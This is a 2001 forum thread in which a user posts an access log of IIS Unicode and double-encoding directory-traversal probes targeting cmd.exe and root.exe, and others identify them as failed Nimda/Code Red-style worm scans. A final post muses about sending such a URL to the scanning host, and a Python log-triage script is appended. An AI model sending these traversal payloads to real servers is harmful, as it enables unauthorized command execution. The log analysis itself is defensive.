Is there a new version of Code Red going around lately? Please look at my log

  1. #1
    Member ba88ms21
    Join date
    2001-05-10
    Forum posts
    233

    Is there a new version of Code Red going around lately? Please look at my log

    61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.24.46 - - [19/Sep/2001:14:54:36 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.140.33 - - [19/Sep/2001:14:55:00 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.140.33 - - [19/Sep/2001:14:55:06 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.140.33 - - [19/Sep/2001:14:55:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.140.33 - - [19/Sep/2001:14:55:23 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.24.46 - - [19/Sep/2001:14:55:24 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.24.46 - - [19/Sep/2001:14:55:49 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.14.22 - - [19/Sep/2001:14:55:53 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.14.22 - - [19/Sep/2001:14:55:55 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.36.174 - - [19/Sep/2001:14:57:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.36.174 - - [19/Sep/2001:14:57:47 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:57:48 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.36.174 - - [19/Sep/2001:14:57:52 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:58:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:58:22 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:28 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:38 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.186.37 - - [19/Sep/2001:14:58:43 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.186.37 - - [19/Sep/2001:14:58:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.186.37 - - [19/Sep/2001:14:58:51 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:58:51 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.186.37 - - [19/Sep/2001:14:58:53 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.186.37 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.36.174 - - [19/Sep/2001:14:59:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.186.37 - - [19/Sep/2001:14:59:04 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:59:08 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.186.37 - - [19/Sep/2001:14:59:09 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.186.37 - - [19/Sep/2001:14:59:11 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    61.216.92.80 - - [19/Sep/2001:14:59:13 +0800] "GET /cy/newimage.js HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/style.css HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/await.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/logo.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/pix.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/sun.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/print.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/friend.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/news.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/compaq.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/vote.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/result.gif HTTP/1.1" 304 -
    61.216.186.37 - - [19/Sep/2001:14:59:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302



  2. #2
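    Member Ares
    Join date
    2001-05-05
    Forum posts
    527
    If I'm not mistaken....
    You're running NT4.0 or WIN2000, right?
    Are you using IIS to host a web server?
    If not, please uninstall it~~~~~~~~~~~~~~
    Someone has gotten onto your C drive.....
    You can easily find loads of PCs on the net that have IIS installed and no protection at all.....
    Even someone whose hacking skill doesn't even count as beginner level (like me) can break in.
    I really don't understand why so many individual users who don't run a website still install 2000 Server; isn't installing Professional, like I did, just fine~~~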

  3. #3
    Member ba88ms21
    Join date
    2001-05-10
    Forum posts
    233
    No, I'm using Apache for Win32. What is going on here?

  4. #4
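    Member
    Join date
    2001-04-15
    Forum posts
    38
    Originally posted by Ares
    If I'm not mistaken....
    You're running NT4.0 or WIN2000, right?
    Are you using IIS to host a web server?
    If not, please uninstall it~~~~~~~~~~~~~~
    Someone has gotten onto your C drive.....
    You can easily find loads of PCs on the net that have IIS installed and no protection at all.....
    Even someone whose hacking skill doesn't even count as beginner level (like me) can break in.
    I really don't understand why so many individual users who don't run a website still install 2000 Server; isn't installing Professional, like I did, just fine~~~

    Did they actually get to the C drive? Look more carefully.. it's a pile of 404s....-.-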

  5. #5
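    Member signally
    Join date
    2001-04-28
    Forum posts
    576
    This isn't RedCode, is it?
    Code Red uses a buffer overflow to break in.
    In your case, someone is using the CGI encoding error
    in Unicode to break in.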



  6. #6
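    Memory-storing hybrid deepblue
    Join date
    2001-08-08
    Location
    ADSL 2/256
    Forum posts
    650
    Perhaps this is BLUECODE or NIMDA.
    These two new viruses could be called the next generation of Code Red.
    Just like cockroaches,
    they keep getting stronger.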

  7. #7
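    Member Ares
    Join date
    2001-05-05
    Forum posts
    527
    Sorry, understood now. If your server is running Apache for Win32, these log entries look like attempts to go through the IIS scripts vulnerability that did not succeed in breaking in. Although the intrusion did not succeed, it will still affect your bandwidth to some degree.
    This may be the NIMDA virus, because as of today this virus has spread everywhere, with about the same impact as CodeRed.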

  8. #8
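    Member
    Join date
    2001-08-19
    Forum posts
    12
    Originally posted by Ares
    Sorry, understood now. If your server is running Apache for Win32, these log entries look like attempts to go through the IIS scripts vulnerability that did not succeed in breaking in. Although the intrusion did not succeed, it will still affect your bandwidth to some degree.
    This may be the NIMDA virus, because as of today this virus has spread everywhere, with about the same impact as CodeRed.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A question for the experts:
          The above was an unsuccessful intrusion, so on a host where the vulnerability has not been patched, wouldn't typing http://61.216.36.174/scripts/..%%35%...d.exe?/c+dir:D into a browser show all of that host's directories directly? I'd appreciate an answer from any of the experts, thanks.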
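
The log in the first post can be triaged mechanically by source address and response status. The following Python is an added example, not part of any post in this thread: it percent-decodes each request path repeatedly, treats the byte pairs seen in the log (`%c0%af`, `%c0%2f`, `%c1%1c`, `%c1%9c`) as slash or backslash stand-ins (an assumption of this example), and counts per address how many `cmd.exe`/`root.exe` probes were made and how many received a 2xx answer. Five sample lines are copied from the first post; the line from 192.0.2.10 is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Five lines copied from the first post; the 192.0.2.10 line is constructed.
SAMPLE = '''
61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
192.0.2.10 - - [19/Sep/2001:15:00:00 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1024
'''

# Common log format: host, ident, user, [time], "method target proto", status, size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Assumption of this example: byte pairs from the log mapped to the separator they stand for.
FOLDED = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x1c": b"\\", b"\xc1\x9c": b"\\"}

def normalise(target, rounds=3):
    """Return the request path with nested %-encoding undone and separators unified."""
    raw = target.split("?", 1)[0].encode("utf-8", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)   # "%%35%63" -> "%5c" -> "\" over two rounds
        for pair, sep in FOLDED.items():
            decoded = decoded.replace(pair, sep)
        if decoded == raw:
            break
        raw = decoded
    return raw.replace(b"\\", b"/").decode("latin-1").lower()

def summarise(log_text):
    """Map source address -> {'probes': n, 'served': n} for cmd.exe/root.exe requests."""
    report = defaultdict(lambda: {"probes": 0, "served": 0})
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ip, _method, target, status = m.groups()
        if normalise(target).endswith(("/cmd.exe", "/root.exe")):
            report[ip]["probes"] += 1
            if status.startswith("2"):    # the server answered the probe: investigate
                report[ip]["served"] += 1
    return dict(report)

if __name__ == "__main__":
    for ip, counts in summarise(SAMPLE).items():
        print(ip, counts)
```

A non-zero `served` count is the case that needs follow-up; addresses with only 400/404 responses match the failed attempts described in the replies.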
